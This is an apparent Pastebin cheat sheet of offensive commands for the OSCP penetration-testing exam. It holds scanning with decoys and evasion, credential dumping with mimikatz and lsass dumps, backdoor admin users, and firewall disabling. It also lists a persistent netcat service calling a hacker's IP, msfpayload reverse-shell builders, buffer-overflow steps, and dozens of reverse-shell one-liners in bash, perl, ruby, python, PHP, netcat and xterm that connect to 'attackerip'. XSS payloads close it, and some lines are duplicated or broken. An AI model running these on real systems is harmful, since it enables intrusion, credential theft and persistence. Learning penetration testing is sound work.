Advertisement
Guest User

OSCPֹ-Tal

a guest
Aug 7th, 2015
4,743
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.30 KB | None | 0 0
  1. OSCP Handy Commands
  2.  
  3. Nmap Full Web Vulnerable Scan:
  4.  
  5.  
  6. mkdir /usr/share/nmap/scripts/vulscan
  7.  
  8. cd /usr/share/nmap/scrripts/vulscan
  9.  
  10. wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
  11.  
  12. nmap -sS -sV –script=vulscan/vulscan.nse target
  13.  
  14. nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
  15.  
  16. nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
  17.  
  18. nmap -PN -sS -sV –script=vulscan –script-args vulscancorrelation=1 -p80 target
  19.  
  20. nmap -sV –script=vuln target
  21.  
  22. nmap -PN -sS -sV –script=all –script-args vulscancorrelation=1 target
  23.  
  24.  
  25. Dirb Directory Bruteforce:
  26.  
  27. dirb http://IP:PORT dirbuster-ng-master/wordlists/common.txt
  28.  
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35. Nikto Scanner:
  36.  
  37. nikto -C all -h http://IP
  38.  
  39.  
  40.  
  41. WordPress Scanner:
  42.  
  43. wpscan –url http://IP/ –enumerate p
  44.  
  45.  
  46.  
  47.  
  48.  
  49.  
  50.  
  51. Uniscan Scanning:
  52.  
  53. uniscan.pl -u target -qweds
  54. HTTP Enumeration:
  55.  
  56. httprint -h http://www.example.com -s signatures.txt
  57. SKIP Fish Scanner:
  58.  
  59. skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66.  
  67. Uniscan Scanning:
  68.  
  69. uniscan –u http://www.hubbardbrook.org –qweds
  70.  
  71. Here, -q – Enable Directory checks
  72. -w – Enable File Checks
  73. -e – Enable robots.txt and sitemap.xml check
  74. -d – Enable Dynamic checks
  75. -s – Enable Static checks
  76.  
  77.  
  78.  
  79.  
  80.  
  81. Skipfish Scanning:
  82.  
  83. m-time threads -LVY donot update after result
  84.  
  85. skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP
  86.  
  87.  
  88.  
  89.  
  90.  
  91. Nmap Ports Scan:
  92.  
  93.  
  94.  
  95. 1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
  96.  
  97.  
  98.  
  99. 1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
  100.  
  101. 2)fargement
  102.  
  103. 3)data packed – like orginal one not scan packet
  104.  
  105. 4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target
  106.  
  107. 5) nmap –source-port 53 target
  108.  
  109.  
  110.  
  111.  
  112.  
  113. nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
  114.  
  115. nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
  116.  
  117. nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)
  118.  
  119. nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
  120.  
  121. nmap -sA -PN -sN target
  122.  
  123. nmap -sS -sV -T5 -F -A -O target (version detection)
  124.  
  125. nmap -sU -v target (Udp)
  126.  
  127. nmap -sU -P0 (Udp)
  128.  
  129. nmap -sC 192.168.31.10-12 (all scan default)
  130. Netcat Scanning:
  131.  
  132. nc -v -w 1 target -z 1-1000
  133.  
  134. for i in {10..12}; do nc -vv -n -w 1 192.168.34.$i 21-25 -z; done
  135.  
  136.  
  137.  
  138. US Scanning:
  139.  
  140. us -H -msf -Iv 192.168.31.20 -p 1-65535 && us -H -mU -Iv 192.168.31.20 -p 1-65535
  141.  
  142.  
  143.  
  144. Unicornscan Scanning:
  145.  
  146. unicornscan X.X.X.X:a -r10000 -v
  147.  
  148.  
  149.  
  150. Kernel Scanning:
  151.  
  152. xprobe2 -v -p tcp:80:open 192.168.6.66
  153.  
  154.  
  155.  
  156. Samba Enumeartion:
  157.  
  158. nmblookup -A target
  159.  
  160. smbclient //MOUNT/share -I target -N
  161.  
  162. rpcclient -U “” target
  163.  
  164. enum4linux target
  165.  
  166.  
  167.  
  168.  
  169.  
  170.  
  171.  
  172.  
  173.  
  174. SNMP ENumeration:
  175.  
  176. snmpget -v 1 -c public IP version
  177.  
  178. snmpwalk -v 1 -c public IP
  179.  
  180. snmpbulkwalk -v 2 -c public IP
  181.  
  182.  
  183.  
  184.  
  185.  
  186.  
  187.  
  188.  
  189.  
  190.  
  191.  
  192. Windows Useful commands:
  193.  
  194.  
  195.  
  196. net localgroup Users
  197.  
  198. net localgroup Administrators
  199.  
  200. search dir/s *.doc
  201.  
  202. system(“start cmd.exe /k $cmd”)
  203.  
  204. sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore
  205.  
  206. /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
  207.  
  208. mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”
  209.  
  210. Procdump.exe -accepteula -ma lsass.exe lsass.dmp
  211.  
  212. mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords”
  213.  
  214. C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
  215.  
  216. C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits
  217.  
  218.  
  219.  
  220.  
  221.  
  222. Plink Tunnel:
  223.  
  224. plink.exe -P 22 -l root -pw “1234” -R 445:127.0.0.1:445 X.X.X.X
  225.  
  226.  
  227. Enable RDP Access:
  228.  
  229. reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
  230.  
  231. netsh firewall set service remoteadmin enable
  232.  
  233. netsh firewall set service remotedesktop enable
  234.  
  235.  
  236.  
  237. Turn Off Firewall:
  238.  
  239. netsh firewall set opmode disable
  240.  
  241.  
  242.  
  243.  
  244.  
  245. Meterpreter:
  246.  
  247.  
  248.  
  249. run getgui -u admin -p 1234
  250.  
  251. run vnc -p 5043
  252.  
  253.  
  254.  
  255.  
  256.  
  257. Add User Windows:
  258.  
  259. net user test 1234 /add
  260.  
  261. net localgroup administrators test /add
  262.  
  263.  
  264.  
  265.  
  266.  
  267. Mimikatz:
  268.  
  269. privilege::debug
  270.  
  271. sekurlsa::logonPasswords full
  272.  
  273.  
  274.  
  275.  
  276.  
  277. Passing the Hash:
  278.  
  279. pth-winexe -U hash //IP cmd
  280.  
  281.  
  282.  
  283.  
  284.  
  285. Password Cracking using Hashcat:
  286.  
  287. hashcat -m 400 -a 0 hash /root/rockyou.txt
  288.  
  289.  
  290.  
  291.  
  292.  
  293.  
  294.  
  295.  
  296.  
  297. Netcat commands:
  298.  
  299. c:> nc -l -p 31337
  300. #nc 192.168.0.10 31337
  301. c:> nc -v -w 30 -p 31337 -l < secret.txt
  302. #nc -v -w 2 192.168.0.10 31337 > secret.txt
  303.  
  304.  
  305.  
  306.  
  307.  
  308. Banner Grabbing:
  309.  
  310. nc 192.168.0.10 80
  311. GET / HTTP/1.1
  312. Host: 192.168.0.10
  313. User-Agent: SPOOFED-BROWSER
  314. Referrer: K0NSP1RACY.COM
  315. <enter>
  316. <enter>
  317.  
  318.  
  319.  
  320.  
  321.  
  322.  
  323.  
  324. window reverse shell:
  325.  
  326.  
  327.  
  328. c:>nc -Lp 31337 -vv -e cmd.exe
  329. nc 192.168.0.10 31337
  330. c:>nc rogue.k0nsp1racy.com 80 -e cmd.exe
  331. nc -lp 80
  332.  
  333.  
  334.  
  335. #nc -lp 31337 -e /bin/bash
  336. nc 192.168.0.11 31337
  337. nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
  338.  
  339.  
  340.  
  341.  
  342.  
  343.  
  344.  
  345.  
  346.  
  347. Find all SUID root files:
  348.  
  349. find / -user root -perm -4000 -print
  350.  
  351.  
  352.  
  353. Find all SGID root files:
  354.  
  355. find / -group root -perm -2000 -print
  356.  
  357.  
  358.  
  359. Find all SUID and SGID files owned by anyone:
  360.  
  361. find / -perm -4000 -o -perm -2000 -print
  362.  
  363.  
  364.  
  365. Find all files that are not owned by any user:
  366.  
  367. find / -nouser -print
  368.  
  369.  
  370.  
  371. Find all files that are not owned by any group:
  372.  
  373. find / -nogroup -print
  374.  
  375.  
  376.  
  377. Find all symlinks and what they point to:
  378.  
  379. find / -type l -ls
  380.  
  381.  
  382.  
  383.  
  384.  
  385.  
  386.  
  387.  
  388.  
  389. Python:
  390.  
  391. python -c ‘import pty;pty.spawn(“/bin/bash”)’
  392.  
  393. python -m SimpleHTTPServer (Starting HTTP Server)
  394.  
  395.  
  396.  
  397.  
  398.  
  399. PID:
  400.  
  401. fuser -nv tcp 80 (list PID of process)
  402.  
  403. fuser -k -n tcp 80 (Kill Process of PID)
  404.  
  405.  
  406.  
  407.  
  408.  
  409. Hydra:
  410.  
  411. hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp (Self Explanatory)
  412.  
  413.  
  414.  
  415. Mount Remote Windows Share:
  416.  
  417. smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
  418.  
  419.  
  420.  
  421.  
  422.  
  423. Compiling Exploit in Kali:
  424.  
  425. gcc -m32 -o output32 hello.c (32 bit)
  426.  
  427. gcc -o output hello.c (64 bit)
  428.  
  429.  
  430.  
  431.  
  432.  
  433.  
  434.  
  435. Compiling Windows Exploits on Kali:
  436.  
  437. cd /root/.wine/drive_c/MinGW/bin
  438.  
  439. wine gcc -o ability.exe /tmp/exploit.c -lwsock32
  440.  
  441. wine ability.exe
  442.  
  443.  
  444.  
  445.  
  446.  
  447. NASM Command:
  448.  
  449. nasm -f bin -o payload.bin payload.asm
  450.  
  451. nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
  452.  
  453.  
  454.  
  455.  
  456.  
  457.  
  458.  
  459. SSH Pivoting:
  460.  
  461.  
  462.  
  463. ssh -D 127.0.0.1:1080 -p 22 user@IP
  464.  
  465. Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
  466.  
  467. proxychains commands target
  468.  
  469.  
  470.  
  471.  
  472.  
  473. Pivoting to One Network to Another:
  474.  
  475.  
  476.  
  477. ssh -D 127.0.0.1:1080 -p 22 user1@IP1
  478.  
  479. Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
  480.  
  481. proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
  482.  
  483. Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
  484.  
  485. proxychains commands target
  486.  
  487.  
  488.  
  489.  
  490.  
  491. Pivoting Using metasploit:
  492.  
  493.  
  494.  
  495. route add 10.1.1.0 255.255.255.0 1
  496.  
  497. route add 10.2.2.0 255.255.255.0 1
  498.  
  499. use auxiliary/server/socks4a
  500.  
  501. run
  502.  
  503. proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
  504.  
  505.  
  506.  
  507.  
  508.  
  509. Exploit-DB search using CSV File:
  510.  
  511.  
  512.  
  513. searchsploit-rb –update
  514.  
  515. searchsploit-rb -t webapps -s WEBAPP
  516.  
  517. searchsploit-rb –search=”Linux Kernel”
  518.  
  519. searchsploit-rb -a “author name” -s “exploit name”
  520.  
  521. searchsploit-rb -t remote -s “exploit name”
  522.  
  523. searchsploit-rb -p linux -t local -s “exploit name”
  524.  
  525.  
  526.  
  527.  
  528.  
  529. For Privilege Escalation Exploit search:
  530.  
  531. cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep “<|<=” | sort -k3
  532.  
  533.  
  534.  
  535.  
  536.  
  537.  
  538.  
  539.  
  540.  
  541. Metasploit Payloads:
  542.  
  543.  
  544.  
  545. msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe
  546.  
  547. msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php
  548.  
  549. msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp
  550.  
  551. msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c
  552.  
  553.  
  554.  
  555. Create a Linux Reverse Meterpreter Binary
  556.  
  557. msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell
  558.  
  559.  
  560.  
  561. Create Reverse Shell (Shellcode)
  562.  
  563. msfpayload windows/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -b “\x00\x0a\x0d”
  564.  
  565.  
  566.  
  567. Create a Reverse Shell Python Script
  568.  
  569. msfpayload cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.py
  570.  
  571.  
  572.  
  573. Create a Reverse ASP Shell
  574.  
  575. msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t asp -o shell.asp
  576.  
  577.  
  578.  
  579. Create a Reverse Bash Shell
  580.  
  581. msfpayload cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.sh
  582.  
  583.  
  584.  
  585. Create a Reverse PHP Shell
  586.  
  587. msfpayload php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.php
  588.  
  589. Edit shell.php in a text editor to add <?php at the beginning.
  590.  
  591.  
  592.  
  593. Create a Windows Reverse Meterpreter Binary
  594.  
  595. msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X >shell.exe
  596.  
  597.  
  598.  
  599.  
  600.  
  601.  
  602.  
  603.  
  604.  
  605. Security Commands In Linux:
  606.  
  607.  
  608.  
  609. find programs with a set uid bit
  610.  
  611. # find / -uid 0 -perm -4000
  612.  
  613.  
  614.  
  615. find things that are world writable
  616.  
  617. # find / -perm -o=w
  618.  
  619.  
  620.  
  621. find names with dots and spaces, there shouldn’t be any
  622. # find / -name ” ” -print
  623. # find / -name “..” -print
  624. # find / -name “. ” -print
  625. # find / -name ” ” -print
  626.  
  627.  
  628.  
  629. find files that are not owned by anyone
  630. # find / -nouser
  631.  
  632.  
  633.  
  634. look for files that are unlinked
  635.  
  636. # lsof +L1
  637.  
  638.  
  639.  
  640. get information about procceses with open ports
  641. # lsof -i
  642.  
  643.  
  644.  
  645. look for weird things in arp
  646. # arp -a
  647.  
  648.  
  649.  
  650. look at all accounts including AD
  651. # getent passwd
  652.  
  653.  
  654.  
  655. look at all groups and membership including AD
  656.  
  657. # getent group
  658.  
  659.  
  660.  
  661. list crontabs for all users including AD
  662. # for user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done
  663.  
  664.  
  665.  
  666. #generate random passwords
  667. cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4
  668.  
  669.  
  670.  
  671. # find all immutable files, there should not be any
  672. find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’
  673.  
  674.  
  675.  
  676. # fix immutable files
  677. chattr -i file
  678.  
  679.  
  680.  
  681.  
  682.  
  683. Windows Buffer Overflow Exploitation Commands:
  684.  
  685.  
  686.  
  687. msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b “\x00″ -t c
  688.  
  689.  
  690.  
  691. msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c
  692. COMMONLY USED BAD CHARACTERS:
  693.  
  694. \x00\x0a\x0d\x20 For http request
  695. \x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)
  696. Useful Commands:
  697.  
  698.  
  699.  
  700. pattern create
  701. pattern offset (EIP Address)
  702. pattern offset (ESP Address)
  703. add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )
  704.  
  705.  
  706.  
  707. !pvefindaddr pattern_create 5000
  708. !pvefindaddr suggest
  709. !pvefindaddr modules
  710. !pvefindaddr nosafeseh
  711.  
  712.  
  713.  
  714.  
  715.  
  716. !mona config -set workingfolder C:\Mona\%p
  717. !mona config -get workingfolder
  718. !mona mod
  719. !mona bytearray -b “\x00\x0a”
  720. !mona pc 5000
  721. !mona po EIP
  722. !mona suggest
  723.  
  724.  
  725.  
  726.  
  727.  
  728.  
  729.  
  730. SEH:
  731.  
  732. !mona suggest
  733. !mona nosafeseh
  734. nseh=”\xeb\x06\x90\x90″ (next seh chain)
  735. iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)
  736.  
  737.  
  738.  
  739.  
  740.  
  741.  
  742.  
  743. ROP (DEP):
  744.  
  745. !mona modules
  746. !mona ropfunc -m *.dll -cpb “\x00\x09\x0a’
  747. !mona rop -m *.dll -cpb “\x00\x09\x0a’ (auto suggest)
  748.  
  749.  
  750.  
  751.  
  752.  
  753. ASLR:
  754.  
  755. !mona noaslr
  756.  
  757.  
  758.  
  759. EGG Hunter:
  760.  
  761. !mona jmp -r esp
  762. !mona egg -t lxxl
  763. \xeb\xc4 (jump backward -60)
  764. buff=lxxllxxl+shell
  765. !mona egg -t ‘w00t’
  766.  
  767.  
  768.  
  769. GDB Debugger Commands:
  770. Setting Breakpoint :
  771.  
  772. break *_start
  773.  
  774.  
  775.  
  776. Execute Next Instruction :
  777.  
  778. next
  779. step
  780. n
  781. s
  782.  
  783.  
  784.  
  785. Continue Execution :
  786.  
  787. continue
  788. c
  789.  
  790.  
  791.  
  792. Data :
  793.  
  794. checking ‘REGISTERS’ and ‘MEMORY’
  795. Display Register Values : (Decimal , Binary , Hex )
  796.  
  797. print /d –> Decimal
  798. print /t –> Binary
  799. print /x –> Hex
  800. O/P :
  801.  
  802. (gdb) print /d $eax
  803.  
  804. $17 = 13
  805.  
  806. (gdb) print /t $eax
  807. $18 = 1101
  808.  
  809. (gdb) print /x $eax
  810. $19 = 0xd
  811. (gdb)
  812.  
  813.  
  814.  
  815.  
  816.  
  817. Display values of specific memory locations :
  818. command : x/nyz (Examine)
  819.  
  820. n –> Number of fields to display ==>
  821. y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
  822. z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
  823. Cheat Codes:
  824.  
  825.  
  826.  
  827. Reverse Shellcode:
  828.  
  829.  
  830.  
  831.  
  832.  
  833. BASH:
  834.  
  835. bash -i >& /dev/tcp/192.168.23.10/443 0>&1
  836.  
  837.  
  838.  
  839. exec /bin/bash 0&0 2>&0
  840. exec /bin/bash 0&0 2>&0
  841.  
  842.  
  843.  
  844. 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
  845.  
  846.  
  847.  
  848. 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
  849.  
  850.  
  851.  
  852. exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
  853. exec 5<>/dev/tcp/attackerip/4444
  854.  
  855.  
  856.  
  857. cat <&5 | while read line; do $line 2>&5 >&5; done # or:
  858. while read line 0<&5; do $line 2>&5 >&5; done
  859.  
  860.  
  861.  
  862. /bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
  863. /bin/bash -i > /dev/tcp/192.168.23.10/443 0<&1 2>&1
  864.  
  865.  
  866.  
  867.  
  868.  
  869.  
  870.  
  871.  
  872.  
  873. PERL:
  874.  
  875. Shorter Perl reverse shell that does not depend on /bin/sh:
  876.  
  877.  
  878.  
  879. perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
  880.  
  881.  
  882.  
  883. perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
  884.  
  885.  
  886.  
  887. If the target system is running Windows use the following one-liner:
  888.  
  889.  
  890.  
  891. perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
  892.  
  893.  
  894.  
  895. perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
  896.  
  897.  
  898.  
  899. perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
  900.  
  901.  
  902.  
  903. perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
  904.  
  905.  
  906.  
  907.  
  908.  
  909.  
  910.  
  911. RUBY:
  912.  
  913. Longer Ruby reverse shell that does not depend on /bin/sh:
  914.  
  915. ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
  916.  
  917.  
  918.  
  919. ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
  920.  
  921.  
  922.  
  923. If the target system is running Windows use the following one-liner:
  924. ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
  925.  
  926.  
  927.  
  928. ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
  929.  
  930.  
  931.  
  932. ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
  933.  
  934.  
  935.  
  936. ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
  937.  
  938.  
  939.  
  940.  
  941.  
  942.  
  943.  
  944. PYTHON:
  945.  
  946.  
  947.  
  948. python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
  949.  
  950.  
  951.  
  952. python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
  953.  
  954.  
  955.  
  956.  
  957.  
  958.  
  959.  
  960. PHP:
  961.  
  962. This code assumes that the TCP connection uses file descriptor 3.
  963.  
  964.  
  965.  
  966. php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’
  967.  
  968. php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’
  969. If you would like a PHP reverse shell to download, try this link on pentestmonkey.net -> LINK
  970.  
  971.  
  972.  
  973.  
  974.  
  975. NETCAT:
  976.  
  977. Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:
  978.  
  979. nc -e /bin/sh attackerip 4444
  980.  
  981. nc -e /bin/sh 192.168.37.10 443
  982.  
  983.  
  984.  
  985. If the -e option is disabled, try this
  986.  
  987.  
  988.  
  989. mknod backpipe p && nc 192.168.23.10 443 0<backpipe | /bin/bash 1>backpipe
  990.  
  991. mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe
  992.  
  993. /bin/sh | nc attackerip 4444
  994.  
  995. /bin/sh | nc 192.168.23.10 443
  996.  
  997. rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/
  998.  
  999. rm -f /tmp/p; mknod /tmp/p p && nc 192.168.23.10 444 0/tmp/
  1000.  
  1001.  
  1002.  
  1003. If you have the wrong version of netcat installed, try
  1004.  
  1005.  
  1006.  
  1007. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.10 >/tmp/f
  1008.  
  1009. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
  1010.  
  1011.  
  1012.  
  1013.  
  1014.  
  1015.  
  1016.  
  1017. TELNET:
  1018.  
  1019. If netcat is not available or /dev/tcp
  1020.  
  1021.  
  1022.  
  1023. mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe
  1024.  
  1025. mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe
  1026.  
  1027.  
  1028.  
  1029.  
  1030.  
  1031.  
  1032.  
  1033. XTERM:
  1034.  
  1035. Xterm is the best..
  1036.  
  1037.  
  1038.  
  1039. To catch incoming xterm, start an open X Server on your system (:1 – which listens on TCP port 6001). One way to do this is with Xnest: It is available on Ubuntu.
  1040.  
  1041.  
  1042.  
  1043. Xnest :1 # Note: The command starts with uppercase X
  1044.  
  1045. Xnest :1 # Note: The command starts with uppercase X
  1046.  
  1047.  
  1048.  
  1049. Then remember to authorise on your system the target IP to connect to you:
  1050.  
  1051. xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
  1052.  
  1053.  
  1054.  
  1055. xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab
  1056.  
  1057. xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
  1058.  
  1059.  
  1060.  
  1061. If you want anyone to connect to this spawned xterm try:
  1062.  
  1063. xhost + # Run this INSIDE the spawned xterm on the open X Server
  1064.  
  1065. xhost + # Run this INSIDE the spawned xterm on the open X Server
  1066.  
  1067.  
  1068.  
  1069. Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
  1070.  
  1071. xterm -display attackerip:1
  1072.  
  1073. xterm -display attackerip:1
  1074.  
  1075.  
  1076.  
  1077. Or:
  1078.  
  1079. $ DISPLAY=attackerip:0 xterm
  1080.  
  1081. $ DISPLAY=attackerip:0 xterm
  1082.  
  1083.  
  1084.  
  1085. It will try to connect back to you, attackerip, on TCP port 6001.
  1086.  
  1087. Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:
  1088.  
  1089.  
  1090.  
  1091. /usr/openwin/bin/xterm -display attackerip:1
  1092.  
  1093. /usr/openwin/bin/xterm -display attackerip:1
  1094.  
  1095.  
  1096.  
  1097.  
  1098.  
  1099. PHP:
  1100.  
  1101. php -r ‘$sock=fsockopen(“192.168.0.100″,4444);exec(“/bin/sh -i <&3 >&3 2>&3″);’
  1102.  
  1103.  
  1104.  
  1105.  
  1106.  
  1107. JAVA:
  1108. r = Runtime.getRuntime()
  1109. p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
  1110. p.waitFor()
  1111.  
  1112.  
  1113.  
  1114.  
  1115.  
  1116.  
  1117.  
  1118.  
  1119.  
  1120. XSS Cheat Codes:
  1121.  
  1122.  
  1123.  
  1124. (“< iframes > src=http://IP:PORT </ iframes >”)
  1125.  
  1126.  
  1127.  
  1128. <script>document.location=http://IP:PORT</script>
  1129.  
  1130.  
  1131.  
  1132. ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  1133.  
  1134.  
  1135.  
  1136. ”;!–“<XSS>=&amp;amp;{()}
  1137.  
  1138.  
  1139.  
  1140. <IMG SRC=”javascript:alert(‘XSS’);”>
  1141. <IMG SRC=javascript:alert(‘XSS’)>
  1142. <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
  1143. <IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;>
  1144.  
  1145.  
  1146.  
